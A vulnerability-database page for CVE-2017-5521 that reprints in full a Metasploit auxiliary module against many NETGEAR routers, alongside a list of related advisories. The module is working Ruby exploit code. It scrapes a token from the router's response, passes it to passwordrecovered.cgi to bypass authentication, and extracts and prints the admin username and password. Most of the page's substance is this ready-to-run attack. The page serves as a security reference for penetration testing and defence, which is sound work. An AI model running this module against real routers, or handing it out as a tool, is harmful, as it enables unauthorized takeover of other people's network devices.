Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NETGEAR Administrator Password Disclosure

🗓️ 05 Feb 2017 18:39:58Reported by Simon Kenin, thecarterbType 
metasploit
 metasploit🔗 www.rapid7.com👁 83 Views

NETGEAR Administrator Password Disclosure module for Metasploit to collect `admin` user password by bypassing authentication and sending malicious requests to the router

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Netgear Routers - Password Disclosure Vulnerabilities
30 Jan 201700:00
zdt
ATTACKERKB		CVE-2017-5521
17 Jan 201700:00
attackerkb
BDU FSTEC		The vulnerability in the built-in software of NETGEAR routers such as NETGEAR R8500, NETGEAR R8300, NETGEAR R7000, NETGEAR R6400, NETGEAR R7300DST, NETGEAR R7100LG, NETGEAR R6300v2, NETGEAR WNDR3400v3, NETGEAR WNDR3500Lv2, NETGEAR R6250, NETGEAR R6700, NETGEAR R6900, NETGEAR R8000, NETGEAR R7900, NETGEAR WNDR4500v2, NETGEAR R6200v2, NETGEAR WNDR3400v2, NETGEAR D6220, NETGEAR D6400, NETGEAR C6300, NETGEAR R6200, NETGEAR R6300, NETGEAR VENG2610, NETGEAR AC1450, NETGEAR WNDR1000v3, NETGEAR WNDR3700v3, NETGEAR WNDR4000, NETGEAR WNDR4500, NETGEAR D6300, NETGEAR D6300B, NETGEAR DGN2200Bv4, and NETGEAR DGN2200v4, allows a hacker to obtain user password information.
2 Feb 201700:00
bdu_fstec
Circl		CVE-2017-5521
30 Jan 201700:00
circl
CISA KEV Catalog		NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability
8 Sep 202200:00
cisa_kev
CNVD		Multiple NETGEAR routers are vulnerable to administrator password information leaks
3 Feb 201700:00
cnvd
Check Point Advisories		NETGEAR Routers Authentication Bypass (CVE-2017-5521)
7 Feb 201700:00
checkpoint_advisories
Check Point Advisories		NETGEAR DGN2200 Remote Code Execution (CVE-2017-5521; CVE-2017-6077)
24 May 201800:00
checkpoint_advisories
CVE		CVE-2017-5521
17 Jan 201709:22
cve
Cvelist		CVE-2017-5521
17 Jan 201709:22
cvelist
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NETGEAR Administrator Password Disclosure',
      'Description'    => %q{
        This module will collect the password for the `admin` user.
        The exploit will not complete if password recovery is set on the router.
        The password is received by passing the token generated from `unauth.cgi`
        to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
        products. The full list of affected products is available in the 'References'
        section.

      },
      'Author'         =>
        [
          'Simon Kenin', # Vuln Discovery, PoC
          'thecarterb'   # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2017-5521' ],
          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18758' ],
          [ 'URL', 'https://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],
          [ 'URL', 'https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/'],
          [ 'URL', 'https://pastebin.com/dB4bTgxz'],
          [ 'EDB', '41205']
        ],
      'License'        => MSF_LICENSE
    ))

    register_options(
    [
      OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
    ])
  end

  # @return substring of 'text', usually a response from a server in this case
  def scrape(text, start_trig, end_trig)
    text[/#{start_trig}(.*?)#{end_trig}/m, 1]
  end

  def run
    uri = target_uri.path
    uri = normalize_uri(uri)
    print_status("Checking if #{rhost} is a NETGEAR router")
    vprint_status("Sending request to http://#{rhost}/")

    # will always call check no matter what
    is_ng = check

    res = send_request_cgi({ 'uri' => uri })
    if res.nil?
      print_error("#{rhost} returned an empty response.")
      return
    end

    if is_ng == Exploit::CheckCode::Detected
      marker_one = "id="
      marker_two = "\""
      token = scrape(res.to_s, marker_one, marker_two)
      if token.nil?
        print_error("#{rhost} is not vulnerable: Token not found")
        return
      end

      if token == '0'
        print_status("If no creds are found, try the exploit again. #{rhost} returned a token of 0")
      end
      print_status("Token found: #{token}")
      vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")

      r = send_request_cgi({
        'uri' => "/passwordrecovered.cgi",
        'vars_get' => { 'id'  =>  token }
      })

      vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")

      html = r.get_html_document
      raw_html = html.text

      username = scrape(raw_html, "Router Admin Username", "Router Admin Password")
      password = scrape(raw_html, "Router Admin Password", "You can")
      if username.nil? || password.nil?
        print_error("#{rhost} returned empty credentials")
        return
      end
      username.strip!
      password.strip!

      if username.empty? || password.empty?
        print_error("No Creds found")
      else
        print_good("Creds found: #{username}/#{password}")
      end
    else
      print_error("#{rhost} is not vulnerable: Not a NETGEAR device")
    end
  end

  # Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
  # This checks the response for that header.
  def check

    res = send_request_cgi({'uri'=>'/'})
    if res.nil?
      fail_with(Failure::Unreachable, 'Connection timed out.')
    end

    # Checks for the `WWW-Authenticate` header in the response
    if res.headers["WWW-Authenticate"]
      data = res.to_s
      marker_one = "Basic realm=\""
      marker_two = "\""
      model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
      print_good("Router is a NETGEAR router (#{model})")
      return Exploit::CheckCode::Detected
    else
      print_error('Router is not a NETGEAR router')
      return Exploit::CheckCode::Safe
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Feb 2022 23:22Current
8.2High risk
Vulners AI Score8.2
CVSS 24.3
CVSS 3.18.1
EPSS0.89294
netgearadministratorpassword disclosuremetasploitmodulebypassingauthenticationvulnerablerouter
83